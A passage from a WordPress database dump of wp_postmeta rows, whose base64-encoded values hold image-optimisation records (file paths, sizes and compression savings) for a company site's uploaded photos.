MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDE5NjI5MS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzAxOTYyOTEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjQ2NCwidGltZSI6MTQ4MzU0ODI2OCwiaWQiOjI1MDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDE5NjI5MS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzAxOTYyOTEtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwMTk2MjkxLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMDgxLCJ0aW1lIjoxNDgzNTQ4MjcyLCJpZCI6MjUwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwMTk2MjkxLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDE5NjI5MS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzAxOTYyOTEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjkzOSwidGltZSI6MTQ4MzU0ODI3NSwiaWQiOjI1MDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDE5NjI5MS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwMTk2MjkxLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwMTk2MjkxLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjU2MTksInRpbWUiOjE0ODM1NDgyODAsImlkIjoyNTA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzAxOTYyOTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwMTk2MjkxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDE5NjI5MS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NDI2LCJ0aW1lIjoxNDgzNTQ4MjgzLCJpZCI6MjUwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwMTk2MjkxLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDE5NjI5MS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzAxOTYyOTEtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjM5MywidGltZSI6MTQ4MzU0ODI4NywiaWQiOjI1MDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDE5NjI5MS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzAxOTYyOTEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwMTk2MjkxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0MjEsInRpbWUiOjE0ODM1NDgyOTAsImlkIjoyNTA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xMzAxOTYyOTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTMwMTk2MjkxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzEzMDE5NjI5MS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NzYxLCJ0aW1lIjoxNDgzNTQ4Mjk0LCJpZCI6MjUwNX1d'); 
INSERT INTO `wp_postmeta` VALUES (28798, 2504, 'wpfc_optimisation_reduction', '192448'); 
INSERT INTO `wp_postmeta` VALUES (28799, 2504, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1iZWFyaW5nLWx1YnJpY2F0aW9uLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1iZWFyaW5nLWx1YnJpY2F0aW9uLmpwZyIsIndpZHRoIjoxMTEzLCJoZWlnaHQiOjY0NywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2F1dG9tb3RpdmUtYmVhcmluZy1sdWJyaWNhdGlvbi5qcGciLCJyZWR1Y3Rpb24iOjE5MjQ0MSwidGltZSI6MTQ4MzU0ODMwMiwiaWQiOiIyNTA0In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWJlYXJpbmctbHVicmljYXRpb24tMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWJlYXJpbmctbHVicmljYXRpb24tMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWJlYXJpbmctbHVicmljYXRpb24tMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDgzMDQsImlkIjoyNTA0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2F1dG9tb3RpdmUtYmVhcmluZy1sdWJyaWNhdGlvbi04MDB4NDY1LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NDY1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2F1dG9tb3RpdmUtYmVhcmluZy1sdWJyaWNhdGlvbi04MDB4NDY1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2F1dG9tb3RpdmUtYmVhcmluZy1sdWJyaWNhdGlvbi04MDB4NDY1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODMwNywiaWQiOjI1MDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1iZWFyaW5nLWx1YnJpY2F0aW9uLTc2OHg0NDYuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0NDYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1iZWFyaW5nLWx1YnJpY2F0aW9uLTc2OHg0NDYuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1iZWFyaW5nLWx1YnJpY2F0aW9uLTc2OHg0NDYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4MzEwLCJpZCI6MjUwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWJlYXJpbmctbHVicmljYXRpb24tMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWJlYXJpbmctbHVicmljYXRpb24tMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWJlYXJpbmctbHVicmljYXRpb24tMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDgzMTIsImlkIjoyNTA0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2F1dG9tb3RpdmUtYmVhcmluZy1sdWJyaWNhdGlvbi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2F1dG9tb3RpdmUtYmVhcmluZy1sdWJyaWNhdGlvbi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2F1dG9tb3RpdmUtYmVhcmluZy1sdWJyaWNhdGlvbi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODMxNCwiaWQiOjI1MDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1iZWFyaW5nLWx1YnJpY2F0aW9uLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1iZWFyaW5nLWx1YnJpY2F0aW9uLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1iZWFyaW5nLWx1YnJpY2F0aW9uLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4MzE2LCJpZCI6MjUwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWJlYXJpbmctbHVicmljYXRpb24tNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWJlYXJpbmctbHVicmljYXRpb24tNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWJlYXJpbmctbHVicmljYXRpb24tNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDgzMTksImlkIjoyNTA0fV0='); 
INSERT INTO `wp_postmeta` VALUES (28800, 2477, 'wpfc_optimisation_reduction', '24056'); 
INSERT INTO `wp_postmeta` VALUES (28801, 2477, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvQ29hdGluZ18tX2dlXzAzMy50aWYuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9Db2F0aW5nXy1fZ2VfMDMzLnRpZi5qcGciLCJ3aWR0aCI6NDgwLCJoZWlnaHQiOjQ4MCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0NvYXRpbmdfLV9nZV8wMzMudGlmLmpwZyIsInJlZHVjdGlvbiI6MjQwNTIsInRpbWUiOjE0ODM1NDgzMjYsImlkIjoiMjQ3NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvQ29hdGluZ18tX2dlXzAzMy50aWYtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9Db2F0aW5nXy1fZ2VfMDMzLnRpZi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0NvYXRpbmdfLV9nZV8wMzMudGlmLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4MzI4LCJpZCI6MjQ3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9Db2F0aW5nXy1fZ2VfMDMzLnRpZi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0NvYXRpbmdfLV9nZV8wMzMudGlmLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvQ29hdGluZ18tX2dlXzAzMy50aWYtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDgzMzAsImlkIjoyNDc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0NvYXRpbmdfLV9nZV8wMzMudGlmLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvQ29hdGluZ18tX2dlXzAzMy50aWYtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9Db2F0aW5nXy1fZ2VfMDMzLnRpZi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODMzMiwiaWQiOjI0Nzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvQ29hdGluZ18tX2dlXzAzMy50aWYtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9Db2F0aW5nXy1fZ2VfMDMzLnRpZi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0NvYXRpbmdfLV9nZV8wMzMudGlmLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4MzM0LCJpZCI6MjQ3N31d'); 
INSERT INTO `wp_postmeta` VALUES (28802, 2475, 'wpfc_optimisation_reduction', '8528'); 
INSERT INTO `wp_postmeta` VALUES (28803, 2475, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLmpwZyIsIndpZHRoIjozNzY4LCJoZWlnaHQiOjI4MjAsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NDgzMzksImlkIjoiMjQ3NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4NDcsInRpbWUiOjE0ODM1NDgzNDMsImlkIjoyNDc1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja183MjU5MzY4MC04MDB4NTk5LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTk5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja183MjU5MzY4MC04MDB4NTk5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja183MjU5MzY4MC04MDB4NTk5LmpwZyIsInJlZHVjdGlvbiI6MTE1MiwidGltZSI6MTQ4MzU0ODM0NywiaWQiOjI0NzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLTc2OHg1NzUuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NzUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLTc2OHg1NzUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzcyNTkzNjgwLTc2OHg1NzUuanBnIiwicmVkdWN0aW9uIjoxMTAwLCJ0aW1lIjoxNDgzNTQ4MzUxLCJpZCI6MjQ3NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNzI1OTM2ODAtMTYwMHgxMTk3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjExOTcsInVybCI6Imh0dHBzOlwvXC